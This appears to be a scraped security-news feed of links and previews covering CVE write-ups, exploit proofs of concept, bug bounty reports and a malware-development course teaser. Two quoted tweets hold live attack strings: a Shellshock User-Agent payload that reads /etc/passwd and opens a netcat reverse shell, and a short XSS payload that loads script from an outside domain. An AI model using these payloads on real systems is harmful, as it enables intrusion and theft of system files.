Information Security
@sec_nerd_en
Information Security News. We are the twin brother of @sec_nerd.
https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790
GitHub Security Lab
Ubuntu apport PID recycling vulnerability (CVE-2019-15790)
This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).
https://i.blackhat.com/asia-20/Friday/asia-20-Yuval-Avrahami-Escaping-Virtualized-Containers.pdf
https://dtm.uk/wuauclt/
@dtmsecurity
Code execution via the Windows Update client (wuauclt)
It's been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.
Today I wanted to share…
https://twitter.com/hunter0x7/status/1315541095783292929
Twitter
Ahsan Khan
Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash
https://blog.dixitaditya.com/one-click-ssl-pinning-bypass-setup
All Things Security
One-click SSL-Pinning Bypass Setup
This article provides an easy single-click Frida installation script and walkthrough for Android application pentests.
https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903
https://medium.com/bugbountywriteup/hacking-http-cors-from-inside-out-512cb125c528?source=rss----7b722bfd1b8d---4
Medium
Hacking HTTP CORS from inside out: a theory to practice approach
https://h0mbre.github.io/RyzenMaster_CVE/
The Human Machine Interface
CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys
Background Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/
GoSecure
Automating local DTD discovery for XXE exploitation
Today, we present the method to exploit XXEs with a local Document Type Declaration (DTD) file. More specifically, how we have built a huge list of reusable DTD files.
https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
mksben.l0.cm
Discord Desktop app RCE
A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...
https://devcraft.io/2020/10/18/github-rce-git-inject.html
devcraft.io
GitHub - RCE via git option injection (almost) - $20,000 Bounty
It had been a while since I’d looked into GitHub, so I thought it would be good to spin up a fresh enterprise trial and see what I could find. The GHE code is obfuscated, but it’s just to discourage customers from messing around and if you do a bit of googling…
https://www.ambionics.io/blog/symfony-secret-fragment
Ambionics
Secret fragments: Remote code execution on Symfony based websites
Remote code execution using Symfony's _fragment page and insecure secret values.
https://devcraft.io/2020/10/19/github-gist-account-takeover.html
devcraft.io
GitHub Gist - Account takeover via open redirect - $10,000 Bounty
While looking into bypasses for the per form CSRF token in my last post, I was digging into every method that was used to generate urls, trying to find one that could be used to create the required token.
https://github.com/BlackFan/client-side-prototype-pollution
GitHub
GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
https://twitter.com/trbughunters/status/1318145809750331392?s=20
Twitter
TR Bug Hunters
an XSS payload with script src for short length inputs <script src=//⑮.₨></script> #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking
https://www.youtube.com/watch?v=Zl2nUJA00Yc
YouTube
Understanding PE relocations in less than 10 min (with PE-bear)
RTO: Malware Development Intermediate course teaser
Link to the course: https://institute.sektor7.net/rto-maldev-intermediate
Other online courses from RED TEAM Operator series: https://institute.sektor7.net
Twitter: https://twitter.com/sektor7net
Labs:…
https://medium.com/@ahmdhalabi/my-bug-bounty-journey-ranking-1st-in-u-s-dod-achieving-top-100-hackers-in-1-year-f208c10144fc
Medium
My Bug Bounty Journey & Ranking 1st in U.S. DoD & Achieving top 100 hackers in 1 year
I am sharing some of my methodology, resources, tips and advice to become a better bug bounty hunter.
https://blog.technitium.com/2020/07/how-to-host-your-own-dns-over-https-and.html
Technitium
How To Host Your Own DNS-over-HTTPS, DNS-over-TLS, And DNS-over-QUIC Services
Updated: 15 Jun 2025. With Technitium DNS Server, you can not just consume DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), or DNS-over-QUI...
https://github.com/github/dmca/pull/8142